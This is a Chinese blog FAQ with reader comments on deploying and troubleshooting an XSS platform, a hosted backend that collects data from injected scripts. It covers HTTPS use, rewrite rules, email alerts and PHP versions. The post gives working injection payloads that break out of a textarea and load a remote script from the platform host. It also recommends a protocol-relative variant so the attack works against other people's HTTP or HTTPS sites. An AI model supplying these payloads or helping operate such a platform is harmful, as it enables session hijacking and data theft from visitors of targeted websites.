A-A+

如何让XSS平台支持HTTPS – 各种XSS平台问题锦集

2018年03月11日 18:04 学习笔记 评论 13 条 阅读 1,681 views 次

【注意:此文章为博主原创文章!转载需注意,请带原文链接,至少也要是txt格式!】

前言:网上可以下载的XSS平台源码总共就那么几个,比较少吧,我在16年9月份发布了【最新特别完善版XSS平台源代码】,网上的70%的平台用的都是这套程序。之后经常遇到各种朋友来问我关于XSS的各种相关问题,其中跟XSS平台相关的问题比较多。这里我列举了几个最多的问题做一一的解答。

第一个问题:

如何让XSS平台支持HTTPS?

答:首先这里含有一个隐藏的问题,就是"XSS平台"需要支持HTTPS吗?我个人的答案是”不需要”。那如何XSS带有HTTPS的站点,其实很简单,首先你需要明白,对方如果是https的站点,那么按照网站通讯原理,它只能加载https的代码。那问题就简单了,我们只需要让我们的xss平台的项目代码支持https即可。

xss平台项目代码

xss平台项目代码

首先正常安装XSS平台,安装完,访问所有的功能都正常后。让网站支持https,这里要注意,伪静态规则什么的千万都不要动。既然网站支持HTTPS了,那么咱们看一下项目代码,这里举例,例如咱们的项目代码是

</tExtArEa>'"><sCRiPt sRC=http://xxxx.com/xxxx></sCrIpT>

那我们访问一下上面项目中的蓝色的那个网址(注意,上面默认的是http的),我们可以改成https的访问一下试试。https://xxxx.com/xxxx 当你打开的时候,正常的显示了你的项目代码,那么就是成功了。完全没必要让平台支持https,项目代码这里支持就可以。然后默认模块的代码处把http也改成https即可。如下图:

默认模块的项目代码也更改一下即可

默认模块的项目代码也更改一下即可

 

问题二:

访问平台项目代码会出现页面404,例如访问http://xxxx.com/xxxx 出现404如何解决?

答:这个问题10有89是XSS平台伪静态规则没有生效出问题了。首先看一下,自带的默认规则是:



RewriteEngine On
RewriteBase /
RewriteRule ^([0-9a-zA-Z]{4})$ xss.php?do=code&urlKey=$1
RewriteRule ^([0-9a-zA-Z]{6})$ xss.php?do=code&urlKey=$1
RewriteRule ^do/auth/(\w+?)(/domain/([\w\.]+?))?$ xss.php?do=do&auth=$1&domain=$3
RewriteRule ^register/(.*?)$ xss.php?do=register&key=$1 
RewriteRule ^register-validate/(.*?)$ xss.php?do=register&act=validate&key=$1
RewriteRule ^login$ xss.php?do=login

这是XSS平台默认的规则,如果这个规则不可以,就请更改XSS平台的伪静态规则文件.htaccess换成如下代码。



RewriteEngine On
RewriteBase /
rewrite "^/([0-9a-zA-Z]{4})$" /xss.php?do=code&urlKey=$1;
rewrite "^/([0-9a-zA-Z]{6})$" /xss.php?do=code&urlKey=$1;
rewrite ^/do/auth/(w+?)(/domain/([w.]+?))?$ /xss.php?do=do&auth=$1&domain=$3;
rewrite ^/register/(.*?)$ /xss.php?do=register&key=$1;
rewrite ^/register-validate/(.*?)$ /xss.php?do=register&act=validate&key=$1;
rewrite ^/login$ /xss.php?do=login;

这里还有另一个可能性,就是你把XSS平台源码放进了二级目录,如果是这样,那你需要更改一下伪静态。需要在伪静态代码前面加入:
RewriteBase /www

 

问题三:
xss平台为什么发不了信?XSS平台无法发送邮件提示?
答:首先你要确认你的空间绝对支持PHP发信,你自己可以随便找一个发信的文件测试一下。 建议用163的邮箱发送邮件。
php.ini这个中的extension=php_sockets.dll这个模块一定是要开启的,如果还不可以,那就可能不支持默认的发信方法,需要更改一下发信规则转换成ssl的发信方法。
具体方法为首先找到source文件夹,然后打开里面的function.php文件,然后如下图所示更改。

把XSS平台发邮件提示功能改为SSL发信方式

把XSS平台发邮件提示功能改为SSL发信方式

 

问题四:
XSS平台设置好后错误或者空白,或者登录后空白??
答:注意你的PHP版本问题,选5.3版本或者php 5.4版本然后再试试。或者5.6的PHP版本!!!!
最终实在实在实在不行,请你用wampserver 这个软件搭建环境,然后测试。【亲测无误!!!】

细节一:

1
<sCRiPt sRC=//xxxx.com/xxx></sCrIpT>

大家X别人网站的时候,建议用上面的方法,注意上面, 并没有放入http或者https,这样X如别人的网站,XSS会自动适应对方的网站,如果对方网站是https那么,这里会自动变成https://xxxxx.com/xxx 如果对方的网站是http那么这里就会自动走http的协议。。。

这里推荐大家看看 Xss平台详细使用教程 相信你绝对会有收获。

标签:

13 条留言  访客:9 条  博主:4 条

  1. packing

    按照你说的问题三,反复测试了,还是不能发信,我本地下载了一个php发送测试过,能发信,唯独收费版的不能发送,环境apache 5.3.29,使用的smtp.163.com邮箱,是不是程序有些不兼容?

  2. packing

    邮箱也是添加到白名单内的

    • gdd

      请本地使用wamp 测试一下呢?

  3. packing

    也不行

  4. what

    SMTP -> ERROR: Failed to connect to server: php_network_getaddresses: getaddrinfo failed: Name or service not known (0)
    SMTP Error: Could not connect to SMTP host.
    请问ssl 465 端口发信 提示这个是什么错误呢 阿里云的服务器

    • gdd

      已经提示无法连接主机了,要么是你端口错了,要么是你服务器没有对外了连接的权限(或者可能需要在阿里的白名单里添加一下主机IP)。

  5. what

    我所有方式都试过了 在服务器里面telnet smtp.qq.com 465 都能通 就是不知道为啥不能发邮件 密码那些都是对的 各种密码都试过了

    • gdd

      那你用163的邮箱试试,别人也出现过,用163的最终就可以的。

  6. jiangsi

    40个模块的源码那个版本设置5.3.29的版本之后访问还是空白 我的架构是lnmp

  7. beipiao

    好好我搭建好了 但是访问xss.php?do=login 是空白是怎么回事呢??

  8. 问题来了

    问题:搭建好你的XSS平台40个模块那个,然后登录创建项目,查看利用代码。
    比如:
    再或者以你任何想要的方式插入
    http://w.net/JptY 访问这个地址应该显示我选择的模块js内容对吧。但我打开一看。404没有
    咋回事。是不是生成的/JptY有问题啊???
    404问题,照上面所说的改了规则,换了php5.3,还是404显示。无语了。

    • gdd

      注意你是什么环境,然后伪静态。你这个明显就是伪静态的问题,研究一下你的伪静态。

  9. 问题来了

    我好像明白了。是用了宝塔linux这个变态的东西,伪静态都不好用了。

给我留言